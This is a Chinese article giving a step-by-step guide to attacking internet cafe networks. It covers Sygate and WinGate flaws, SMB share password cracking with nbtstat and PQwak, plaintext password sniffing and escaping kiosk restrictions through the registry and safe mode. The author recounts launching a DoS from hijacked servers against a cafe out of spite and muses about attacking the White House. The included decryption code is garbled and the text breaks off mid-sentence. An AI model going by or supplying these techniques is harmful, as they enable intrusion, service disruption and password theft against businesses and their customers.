网吧攻防小全 - 王朝网络

大家事不是经常到网吧上网，对于老板的服务态度可谓是“深恶痛绝”（至少笔者学校附近的是这样的）。所以笔者写了对于网吧的攻击的文章，这里对于局域网也有效。由于笔者也是初学所以说的不对之处还要叫大家斧正。

1．NAT软件的漏洞

在网吧使用最多的还是一些第三方软件，网吧的老板用这些软件来使得大家共享互联网。常见的有sygate和wingate。

●Sygate的攻击很简单，在它的某些版本中存在一个隐藏的管理端口: 7323.出于安全考虑，这个端口只允许从内部局域网连接。如果内部网中有机器开了RAS服务，外部网络中的主机也可能访问到这个端口。任何局域网用户都可通过这个端口终止sygate的NAT服务，挂断或重新拨号而不需要口令。

例如：telnet 192.168.1.1 7323

SyGate 3.0 for Windows 95/98/NT build 522

Welcome to SyGate remote controller!

For security purpose, SyGate remote controller can be access

only from your Local Area Network (LAN).

======== Function Key ==========

P Stop SyGate Service

D Display SyGate Status

N To Dial ( Dial-Up Networking only )

F To Hang Up( Dial-Up Networking only )

T Display All TCP Connection(s)

U Display All UDP Connection(s)

Ready to accept command. Press one function key, or 'H' for help.

我们在这里选择P，就停止了sygate的工作了。哈哈。这个漏洞你远程也可以利用。好像还有个叫网吧杀手的软件，就是利用这个来攻击的。黑狐网络www.heihoo.com 提供下载

●Wingate3.0的攻击

1)攻击者可以远程读取系统文件;

任意用户都可以通过类似如下的URL读取系统文件:

http://www.server.com:8010/c:/ - NT/Win9x

http://www.server.com:8010// - NT/Win9x

http://www.server.com:8010/..../ - Win9x

2)WinGate服务器易受到拒绝服务攻击;

Winsock重定向服务被绑定在2080端口上,连接到这个端口,发送超过2000 Byte,然后中

断连接,Winsock将停止服务;

3)WinGate 3.0使用弱加密的密码;

WinGate的密码至今过简单加密后就存放在注册表中,任意用户都可以读取它,并且很

容易解密. 解密程序如下:

------------------------------------------------------------

#include "stdafx.h"

#include

main(int argc, char *argv[]) {

char i;

for(i = 0; i

putchar(argv[1][i]^(char)((i + 1)

return 0;

}

建议:

在WinGate的服务设定中限制访问地址,只提供服务给确定可信的客户。

以上是有wingate有这个漏洞，大家注意。

2.对于网吧服务器的D.O.S（拒绝服务）攻击

由于笔者附近的网吧条件很差，用作代理的服务器系统都是win 98。有一日笔者在家里上网，正好同学网吧。那时正好是中美黑客大战的高峰时期，笔者的手底下也正好有大量的台湾和日本的服务器，很多都是3389输入法漏洞的得到的系统admin。突发奇想同学在的网吧平常要价很好，服务很差，老板有事有名的吝啬鬼。我何不利用肉鸡给它来的D.O.S呢。于是笔者准备了5台win中断服务的肉鸡，每个都装上了发IGMP数据包的软件（考虑到台湾服务器的速度的狂野，笔者装的是最暴力的IGMP的软件，就是可以用1000个线程的那种）。准备就绪了，发射。大量的数据堵塞了网吧的139端口，再加上98自身的漏洞，服务器不等反应过来就当机了。

对于装了防火墙的主机，防火墙拦截IGMP的数据包的。不过软件防火墙本身占用系统资源，如果大量的需要判断的报文发送过去，是不是会导致DoS呢？笔者没试过，要是有那么多的主机给白宫来个多好呀。

3.网吧SMB共享的漏洞

Windows SMB被叫做“文件和打印共享”，它允许你访问共享被其他用户许可的文件和文件夹。基于Windows 95, 98或Windows Millenium的共享，即使你加了密码也是不安全的，利用这个共享，你可以得到从游戏到信用卡号码，音乐或数据库，甚至任何你想要的信息。

当你知道网吧是SMB共享时，在运行窗口中键入"\\ip"，按回车，之后等待。完成后将出现一个带共享名的文件夹。如果它出现了一些像“不共享”“IP地址连接不上”等，就是没成功了。也可以下载SMBScanner( http://www.cners.com/tools/smbscanner.zip),来扫描这样的主机。

如果人家要密码的，Windows 95, 98, and Millenium有个“速度破解漏洞。打开“运行”窗口，输入“command”如果你在用WindowsNT/2000的话请输入“cmd”打开一个命令窗口，键入“nbtstat -a ipaddress”（帮助文档情况请键入“？”）你将看到如下的输出：

Local Area Connection:

Node IpAddress: [4.3.37.XXX] Scope Id: []

NetBIOS Remote Machine Name Table

Name Type Status

---------------------------------------------

MATRIX UNIQUE Registered ------------------------重要!

WORKGROUP GROUP Registered

MATRIX UNIQUE Registered

WORKGROUP GROUP Registered

ADMINISTRATOR UNIQUE Registered

WORKGROUP UNIQUE Registered

..__MSBROWSE__. GROUP Registered

MATRIX UNIQUE Registered

MAC Address = 00-80-C6-F9-X-X

最靠前的名字是NetBIOS name (MATRIX)，第六行的是用户名，注意：请记好NetBIOS name!，我们将用它破解共享名文件夹的password。

下载，然后打开 PQwak( http://www.cners.com/tools/PQwak.exe)。

--在NBMAME右面输入nbtstat中显示的NetBIOS name

--在SHARE栏里输入受密码保护的共享文件夹名。

--在IP栏里输入IP地址（期望我们找到的对象在用DSL或长时间上网，否则我们做了那么多后，他下线了，岂不是！?#￥%%……）

--设置DELAY，要看你的连接方式，如果你用56k的小猫的话，建议把DELAY设置在1000-2000，如果你用ADSL的话，建议在800-900。

运行 PQwak，不会让您浪费很长时间，完成后返回到受密码保护的共享文件夹，打开它，当它要网络密码时，将PQwak里的密码拷贝下来，再粘贴到密码对话框，然后 Do what you exactly want to do!

注意：如果你运行PQwak后出现“the password is a ' or the password is wrong”，请将DELAY数值调高。

4.明文密码的截获

网吧就是个局域网，有人说局域网根本没有安全可言，什么数据都广播。利用这个我们可以截获一些密码的明文，例如：pop3,ftp,telnet的密码，早期的协议没有考虑到网络的安全性，密码都是明文在网上裸奔。用netxary能截包软件就很容易得到别人的密码。这里截包软件不多说了，请看相关的教程。值得一提的是foxmail的邮件监视器，简直就是定时发送口令明文，用NetXray抓从client到server包，指定过滤PASS关键字，非常清楚。

5.美萍等软件的破解

是软件就有正版和盗版之分,同样美萍又有注册和未注册之分.同样是注册的美萍又有限制级别之分.不过对于我们呢,就只有好破的和不好破的两种.言归正传,想要自由最重要的几个工具就是:

Control.exe,Regedit.exe,Msconfig.exe.有了这几种神兵利器你还不是想干什么就能干什么.工具是要用,可是人家不让怎么办?小生主要是通过以下几种办法:

●利用地址栏

在美萍中限制最差的只要在IE的地址栏里敲入file:///c:/windows/control.exe就可以调出控制面板.如果是WINDOWS98,那么点一下向上的按纽就可以调出我的电脑.如果是WINDOWS95就请试试EXPLORER.EXE吧,不过好像不太管用.

●利用文件下拉菜单

点一下IE的文件下拉菜单,点一下打开,点一下浏览,是不是什么文件都可以看见?选择你想要的文件,点一下"确定",可以吗?

如果不行请把"以WEB文件夹方式打开"的单选框选上再试一次,这时会跳出一个提示框:IE无法将某文件作为WEB文件夹打开.是否按默认方式查看?选取"是"会跳出文件下载提示框询问如何处理该文件,点一下"在当前位置运行该程序"单选框,点一下"确定"会出现一个安全设置警告提示框,再点一下"是",你就可以运行该程序了.

什么,没有反应?那就只好再深入一步......

●利用邮件编辑器

随便打开一个网址,例如网易的主页.页面的最下端有一个"联系我们"超级链接.点一下会跳出邮件编辑器OUTLOOK或是FOXMAIL.有什么用?选取加入附件,浏览选定,然后点一下它,一定可以运行.

如果控制面扳和注册表编辑器被禁用了?那么请试试MSCONFIG.EXE.点一下诊断启动单选框,点一下"确定",下一次启动时就不会加载美萍.

在极少数的情况下连MSCONFIG.EXE都被禁用了,那么用NOTEPAD.EXE导入注册表文件的方法解开控制面扳和注册表编辑器.用NOTEPAD.EXE新建一个文本文件,把下面的内容打进去,把文件的扩展名*.TXT另存为*.REG,然后双击该文件,点"是"就可以导入注册表.

(REGEDIT4 [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]

"NoDevMgrPage"=dword:00000000

"disableregistrytools"=dword:00000000)

如果NOTEPAD.EXE也被禁用了??

●利用安全模式

没关系,要是你不想再上网了,我们还有一个法宝:安全模式!

重新启动计算机在"STARTING WINDOWS......"后按住CTR键会出现启动菜单.如果没有那是C:\MSDOS.SYS文件中BOOTKEY=0了.看到蓝天